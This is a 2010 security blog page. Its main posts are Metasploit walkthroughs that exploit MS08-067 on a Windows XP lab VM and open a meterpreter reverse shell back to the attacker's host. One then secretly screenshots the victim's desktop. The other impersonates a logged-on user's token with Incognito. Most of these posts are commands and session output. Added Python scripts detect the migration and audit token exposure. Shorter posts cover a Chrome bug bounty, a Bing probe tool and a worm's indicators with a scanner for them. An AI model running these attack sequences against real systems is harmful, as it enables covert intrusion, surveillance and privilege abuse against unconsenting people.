Taking Screenshots Of The Victim’s Computer With Metasploit

January 30, 2010 – 3:51 PM

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module. Start with a basic exploit to gain a meterpreter session. Before taking the screenshot, make sure you migrate into a process that has access to the Active Desktop; otherwise you will get nothing but blank images:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name   Arch   User   Path
---   ----   ----   ----   ----
0   [System Process]
4   System   x86   NT AUTHORITY\SYSTEM
384   smss.exe   x86   NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
524   csrss.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe   x86   NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
704   lsass.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
972   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1064   svchost.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
1124   svchost.exe   x86   NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
1192   svchost.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\system32\svchost.exe
1452   spoolsv.exe   x86   NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe   x86   VM-WINXP\Troy   C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\ctfmon.exe
656   alg.exe   x86   NT AUTHORITY\LOCAL SERVICE   C:\WINDOWS\System32\alg.exe
1252   wscntfy.exe   x86   VM-WINXP\Troy   C:\WINDOWS\system32\wscntfy.exe
1940   firefox.exe   x86   VM-WINXP\Troy   C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >

Now we load the espia module and view the victim’s live desktop:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically and display on your screen.

That’s it. You are now viewing the victim’s desktop without them even knowing you are there.
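From the defender’s side, the step that matters in the session above is the migration: a SYSTEM-level session has no desktop of its own and only sees the screen once it lands a thread in the logged-on user’s shell (explorer.exe, PID 284, running as Troy in the process list). The following is an added detection example, not code from this post or from Metasploit, that flags exactly that pattern over constructed event records: a thread created in explorer.exe from a process running under a different account, or from a start address not backed by any module on disk. The field names (SourceImage, SourceUser, TargetImage, TargetUser, StartModule) are modelled on Sysmon’s Event ID 8 CreateRemoteThread record; the records themselves, the choice of svchost.exe as the source and the allowlist of legitimate thread creators are all assumptions.

```python
"""Added example (not from the original post): flag a meterpreter-style
'migrate' into the interactive user's shell.

The records below are constructed sample data whose field names follow Sysmon's
Event ID 8 (CreateRemoteThread) record; they are not real telemetry. The
allowlist of legitimate thread creators is an assumption to be tuned per site."""

# Processes that legitimately create threads in other processes (assumption).
KNOWN_THREAD_CREATORS = {"csrss.exe"}

# Constructed records: one event per line, "Key=Value" pairs separated by "|".
# Record 1 mirrors the post's scenario: a SYSTEM-level process creates a thread
# in explorer.exe, which belongs to the logged-on user "Troy".
SAMPLE_EVENTS = r"""
EventID=8|SourceImage=C:\WINDOWS\system32\svchost.exe|SourceUser=NT AUTHORITY\SYSTEM|TargetImage=C:\WINDOWS\Explorer.EXE|TargetUser=VM-WINXP\Troy|StartModule=-|StartFunction=-
EventID=8|SourceImage=C:\Program Files\Mozilla Firefox\firefox.exe|SourceUser=VM-WINXP\Troy|TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe|TargetUser=VM-WINXP\Troy|StartModule=C:\WINDOWS\system32\kernel32.dll|StartFunction=LoadLibraryW
EventID=8|SourceImage=C:\WINDOWS\system32\csrss.exe|SourceUser=NT AUTHORITY\SYSTEM|TargetImage=C:\WINDOWS\Explorer.EXE|TargetUser=VM-WINXP\Troy|StartModule=C:\WINDOWS\system32\ntdll.dll|StartFunction=RtlUserThreadStart
EventID=1|Image=C:\WINDOWS\system32\notepad.exe|User=VM-WINXP\Troy
"""


def parse_event(line):
    """Split one 'Key=Value|Key=Value' record into a dict."""
    fields = {}
    for pair in line.split("|"):
        key, _, value = pair.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons this CreateRemoteThread event is suspicious
    (an empty list when it is not)."""
    if event.get("EventID") != "8":
        return []
    src = image_name(event["SourceImage"])
    dst = image_name(event["TargetImage"])
    if dst != "explorer.exe" or src in KNOWN_THREAD_CREATORS:
        return []
    reasons = []
    if event["SourceUser"] != event["TargetUser"]:
        # A service-level process has no desktop; a thread landing in the
        # logged-on user's shell is how a session gains access to that desktop.
        reasons.append("cross-account thread into the interactive shell: %s -> %s"
                       % (event["SourceUser"], event["TargetUser"]))
    if event.get("StartModule", "-") == "-":
        # Injected code is not backed by any module on disk.
        reasons.append("thread start address not backed by a loaded module")
    return reasons


def detect(log_text):
    """Run classify() over every record; return (source image, source user, reasons)."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            alerts.append((image_name(event["SourceImage"]), event["SourceUser"], reasons))
    return alerts


if __name__ == "__main__":
    for image, user, reasons in detect(SAMPLE_EVENTS):
        print("ALERT %s (%s): %s" % (image, user, "; ".join(reasons)))
```

Run as is, the script raises one alert, for the svchost.exe-to-explorer.exe record, and stays quiet on firefox.exe creating a thread in itself and on csrss.exe, which is allowlisted. The allowlist is the part that needs real tuning: in a production feed you would build it from a baseline of which processes create threads in explorer.exe on your own hosts.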

Using Metasploit’s Incognito To Impersonate User Tokens

January 30, 2010 – 10:48 AM

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system. You can think of a token as a web “cookie”: an object that holds your security information for the entire login session, so that you don’t have to re-authenticate to the system or network each time you want to access another object. You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system. For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)

meterpreter >

Once we have a meterpreter session we can load the Incognito module, list the available tokens, and impersonate the one we want:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito…success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
VM-WINXP\Troy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token vm-winxp\\troy
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
VM-WINXP\Troy
C:\WINDOWS\system32>exit
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Complete success without having to crack passwords or “pass the hash”.
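The list_tokens output above is also the defender’s map of exposure: VM-WINXP\Troy appears under delegation tokens because Troy is logged on interactively (explorer.exe runs as Troy in the process list), whereas a network logon would have left only an impersonation token. The following added example, which is not code from this post or from Metasploit, turns that rule into an audit over Windows Security log 4624 records: which privileged accounts have left a delegation token on a host where they are not expected. The logon type numbers are the real Windows values; the privileged-account list, the admin-workstation allowlist and the log records are constructed assumptions.

```python
"""Added example (not from the original post): audit which privileged accounts
leave a delegation token on which host, from Windows Security log 4624 events.

Logon types are the real Windows values (2 interactive, 3 network, 4 batch,
5 service, 10 remote interactive, 11 cached interactive). The privileged
account list, the admin-workstation allowlist and the log lines are constructed."""

import re

# Logon types that leave a primary (delegation) token on the host; a network
# logon (type 3) leaves only an impersonation token.
DELEGATION_LOGON_TYPES = {
    "2": "Interactive", "4": "Batch", "5": "Service",
    "10": "RemoteInteractive", "11": "CachedInteractive",
}

# Assumptions: accounts whose tokens matter, and hosts where their logons are expected.
PRIVILEGED_ACCOUNTS = {r"vm-winxp\troy", r"corp\da-backup"}
ADMIN_WORKSTATIONS = {"PAW01"}

# Constructed 4624/4634 records (Key=Value, space separated; values may contain spaces).
SAMPLE_4624 = """
Computer=VM-WINXP EventID=4624 TargetDomainName=VM-WINXP TargetUserName=Troy LogonType=2
Computer=VM-WINXP EventID=4624 TargetDomainName=NT AUTHORITY TargetUserName=NETWORK SERVICE LogonType=5
Computer=FILESRV01 EventID=4624 TargetDomainName=VM-WINXP TargetUserName=Troy LogonType=3
Computer=PAW01 EventID=4624 TargetDomainName=CORP TargetUserName=da-backup LogonType=2
Computer=WS-042 EventID=4624 TargetDomainName=CORP TargetUserName=da-backup LogonType=10
Computer=WS-042 EventID=4634 TargetDomainName=CORP TargetUserName=da-backup LogonType=10
"""

# A value runs up to the next " Key=" or the end of the line, so spaces inside
# values ("NT AUTHORITY") survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_record(line):
    """Parse one 'Key=Value Key=Value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def token_kind(logon_type):
    """'delegation' for logons that leave a primary token, 'impersonation' otherwise."""
    return "delegation" if logon_type in DELEGATION_LOGON_TYPES else "impersonation"


def exposed_delegation_tokens(log_text):
    """Return sorted (host, account, logon type name) triples for privileged
    accounts that logged on in a way that leaves a delegation token on a host
    outside the admin-workstation allowlist."""
    findings = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if rec.get("EventID") != "4624":
            continue
        account = ("%s\\%s" % (rec["TargetDomainName"], rec["TargetUserName"])).lower()
        if account not in PRIVILEGED_ACCOUNTS:
            continue
        if token_kind(rec["LogonType"]) != "delegation":
            continue
        if rec["Computer"] in ADMIN_WORKSTATIONS:
            continue
        findings.add((rec["Computer"], account, DELEGATION_LOGON_TYPES[rec["LogonType"]]))
    return sorted(findings)


if __name__ == "__main__":
    for host, account, how in exposed_delegation_tokens(SAMPLE_4624):
        print("%s: %s logged on (%s) -> delegation token exposed" % (host, account, how))
```

On the constructed data the audit reports Troy on VM-WINXP (the situation in the post) and da-backup on WS-042, and ignores Troy’s network logon to FILESRV01 and da-backup’s logon to the allowlisted PAW01. The practical consequence is the one the post demonstrates: once a machine is compromised at SYSTEM level, every delegation token on it is usable without a password or hash, so the fix is to keep privileged accounts off hosts where they have no business logging on interactively.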

Your Google Chrome Bugs Could Be Worth $500-$1337

January 29, 2010 – 11:21 AM

Google has recently launched an “experimental new incentive” that could reward security researchers for their bugs in the Chrome browser (all versions – stable, beta, and dev) or in the open source Chromium project itself.  Their base reward is identical to Mozilla’s at $500, but they are offering a higher reward of $1337 for “particularly severe or particularly clever” bugs/vulnerabilities.

I personally like this and I hope a lot of researchers step up and claim the rewards.  The more bugs that get reported responsibly, the more secure the users of the Chrome browser will be.  Coupled with the major built-in security features already in place, this could very well put Chrome on top of the browser market.

Source:
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html

Bing Web Server Probe

January 28, 2010 – 6:43 PM

This is a tool for security researchers. It allows you to search for either an IP address or a DNS name and display all associated domain names known to Bing.

Download:
http://bingprobe.codeplex.com/

Newest “IQ Test” Is Pure Evil

January 25, 2010 – 5:49 PM

Named Win32.Worm.Zimuse.A, this new nasty claims to be an IQ Test but is really a worm that creates about 7-11 copies of itself, stores them in critical areas of your Windows system, and then destroys the first 50KB of the Master Boot Record (MBR) after a set number of days (variant A is reported to wait 40 days, variant B 20 days).

The worm adds itself to the registry at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Dump"="%programfiles%\Dump\Dump.exe"

It also creates the following two “driver” files:

%system%\drivers\Mstart.sys
%system%\drivers\Mseu.sys
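Because the MBR wipe is on a timer, the indicators above are worth checking before day 20 or 40 rather than after. The following added example, not code from the source article or from the vendor, checks a host for exactly those indicators: the “Dump” value under the Run key and the two driver files. The reg query output and the drivers directory listing are constructed sample data; the Run value is matched on the tail of its data so that both the unexpanded %programfiles% form given in the post and an expanded path are caught.

```python
"""Added example (not from the source article): check a host for the
Win32.Worm.Zimuse.A indicators given in the post (the "Dump" Run value and the
two driver files). The `reg query` output and the driver directory listing
below are constructed sample data."""

import re

# Indicators from the post. The Run value data is matched on its tail so that
# both "%programfiles%\Dump\Dump.exe" and an expanded path are caught.
ZIMUSE_RUN_VALUE = "dump"
ZIMUSE_RUN_DATA_TAIL = r"\dump\dump.exe"
ZIMUSE_DRIVERS = {"mstart.sys", "mseu.sys"}

# Constructed output of: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VBoxTray    REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Dump    REG_EXPAND_SZ    %programfiles%\Dump\Dump.exe
"""

# Constructed listing of %system%\drivers
SAMPLE_DRIVER_DIR = [
    r"C:\WINDOWS\system32\drivers\afd.sys",
    r"C:\WINDOWS\system32\drivers\Mstart.sys",
    r"C:\WINDOWS\system32\drivers\Mseu.sys",
    r"C:\WINDOWS\system32\drivers\tcpip.sys",
]


def parse_reg_query(text):
    """Parse `reg query` output into {value name: (type, data)}.
    Columns are separated by runs of four or more spaces, so value names and
    data may themselves contain single spaces (e.g. "C:\\Program Files")."""
    values = {}
    for line in text.splitlines():
        parts = re.split(r"\s{4,}", line.strip())
        if len(parts) == 3 and parts[1].startswith("REG_"):
            values[parts[0]] = (parts[1], parts[2])
    return values


def check_run_key(values):
    """Return Run values that match the worm's persistence entry."""
    hits = []
    for name, (reg_type, data) in values.items():
        if name.lower() == ZIMUSE_RUN_VALUE and data.lower().endswith(ZIMUSE_RUN_DATA_TAIL):
            hits.append("%s = %s (%s)" % (name, data, reg_type))
    return hits


def check_drivers(paths):
    """Return driver paths whose file name matches one the worm drops."""
    return [p for p in paths if p.rsplit("\\", 1)[-1].lower() in ZIMUSE_DRIVERS]


def scan(reg_query_text, driver_paths):
    """Combine both checks; 'infected' is True when any indicator is present."""
    run_hits = check_run_key(parse_reg_query(reg_query_text))
    driver_hits = check_drivers(driver_paths)
    return {"run_key": run_hits, "drivers": driver_hits,
            "infected": bool(run_hits or driver_hits)}


if __name__ == "__main__":
    result = scan(SAMPLE_REG_QUERY, SAMPLE_DRIVER_DIR)
    for hit in result["run_key"]:
        print("Run key:", hit)
    for hit in result["drivers"]:
        print("Driver:", hit)
    print("infected:", result["infected"])
```

On a real host, feed scan() the output of reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and a listing of %SystemRoot%\system32\drivers. The names are only those reported for variant A in the source; other variants may use different file names, so a miss here is not a clean bill of health.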

Source:
http://www.malwarecity.com/blog/malware-alert-win32wormzimusea-the-hard-disk-wrecker-736.html